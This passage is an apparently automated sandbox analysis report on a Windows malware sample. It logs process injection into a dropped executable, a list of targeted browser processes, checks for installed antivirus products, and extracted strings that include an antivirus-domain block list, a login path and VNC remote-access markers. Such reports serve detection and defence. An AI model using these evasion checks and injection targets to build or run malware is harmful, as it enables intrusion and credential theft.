Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2825000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: F30000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: F31000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: F32000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: F85000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2ED0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2ED1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2ED2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F25000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2980000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2981000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2982000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29D5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 21D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2225000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BC78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_006A78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_014E78A0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile opened: CA HIPS KmxAgentJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeWindow found: AVP NULL ____AVP.RootJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: CA HIPS KmxAgentJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: Agnitum Outpost firewal \pipe\acsipc_serverJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csiJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.datJump to behavior
Source: C:\Windows\apppatch\svchost.exeWindow found: AVP NULL ____AVP.RootJump to behavior
Source: nFjEHtbDTFjy.exe, 00000005.00000000.1672940579.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000006.00000000.1673693057.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000007.00000000.1674971269.0000000001541000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
Source: OjKmJJm2YT.exe, OjKmJJm2YT.exe, 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, OjKmJJm2YT.exe, 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: nFjEHtbDTFjy.exe, 00000005.00000000.1672940579.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000006.00000000.1673693057.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000007.00000000.1674971269.0000000001541000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: OjKmJJm2YT.exe, 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, OjKmJJm2YT.exe, 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
Source: nFjEHtbDTFjy.exe, 00000005.00000000.1672940579.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000006.00000000.1673693057.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000007.00000000.1674971269.0000000001541000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00414050 cpuid 0_2_00414050
Source: C:\Windows\apppatch\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\apppatch\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00402360 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402360
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00403A20 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC6970 memset,GetProcessHeap,HeapAlloc,memset,GetTimeZoneInformation,Sleep,IsUserAnAdmin,GetTickCount,_snprintf,GetTempPathA,GetTempFileNameA,SetFileAttributesA,DeleteFileA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,SetFileAttributesA,DeleteFileA,Sleep,Sleep,2_2_02BC6970
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004034C0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004034C0
Source: OjKmJJm2YT.exeBinary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality

barindex
Source: OjKmJJm2YT.exeString found in binary or memory: RFB 003.006
Source: OjKmJJm2YT.exe, 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: OjKmJJm2YT.exe, 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: OjKmJJm2YT.exe, 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: RFB 003.006
Source: OjKmJJm2YT.exe, 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exeString found in binary or memory: RFB 003.006
Source: svchost.exeString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2594045872.0000000002A00000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2594045872.0000000002A00000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.1339491124.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1339491124.0000000000883000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2594045872.0000000002A56000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2594045872.0000000002A56000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000002.2594339878.0000000002C13000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000002.2594339878.0000000002C13000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exeString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exeString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000005.00000002.1781805646.0000000000630000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000005.00000002.1781805646.0000000000630000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000005.00000002.1782040973.0000000000690000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000005.00000002.1782040973.0000000000690000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exeString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exeString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000006.00000002.1796972429.0000000001470000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000006.00000002.1796972429.0000000001470000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000006.00000002.1797084342.00000000014D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000006.00000002.1797084342.00000000014D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000007.00000002.1781782931.0000000002BE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000007.00000002.1781782931.0000000002BE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000007.00000002.1782094924.0000000002DC0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000007.00000002.1782094924.0000000002DC0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 0000000B.00000002.1783966144.0000000002D90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 0000000B.00000002.1783966144.0000000002D90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 0000000B.00000002.1784273852.0000000002EF0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 0000000B.00000002.1784273852.0000000002EF0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 0000000E.00000002.1695271087.0000000002AE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 0000000E.00000002.1695271087.0000000002AE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 0000000E.00000002.1692126085.0000000002A80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 0000000E.00000002.1692126085.0000000002A80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000010.00000002.1708419201.0000000002BA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000010.00000002.1708419201.0000000002BA0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000010.00000002.1707606160.00000000029F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000010.00000002.1707606160.00000000029F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000015.00000002.1711573313.0000000002440000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000015.00000002.1711573313.0000000002440000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000015.00000002.1710398106.0000000002170000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000015.00000002.1710398106.0000000002170000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000018.00000002.1711007542.0000000000D90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000018.00000002.1711007542.0000000000D90000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000018.00000002.1711887152.0000000002A10000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000018.00000002.1711887152.0000000002A10000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001A.00000002.1714288290.0000000002490000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001A.00000002.1714288290.0000000002490000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001A.00000002.1713723787.00000000020F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001A.00000002.1713723787.00000000020F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001C.00000002.1718939420.0000000002B00000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001C.00000002.1718939420.0000000002B00000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001C.00000002.1718079972.00000000029A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001C.00000002.1718079972.00000000029A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001E.00000002.1723103322.00000000020D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001E.00000002.1723103322.00000000020D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001E.00000002.1724014803.0000000002480000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 0000001E.00000002.1724014803.0000000002480000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000020.00000002.1727055107.00000000032F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000020.00000002.1727055107.00000000032F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000020.00000002.1726470289.0000000003040000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, 00000020.00000002.1726470289.0000000003040000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: nFjEHtbDTFjy.exe, 00000022.00000002.1732800865.0000000002D80000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
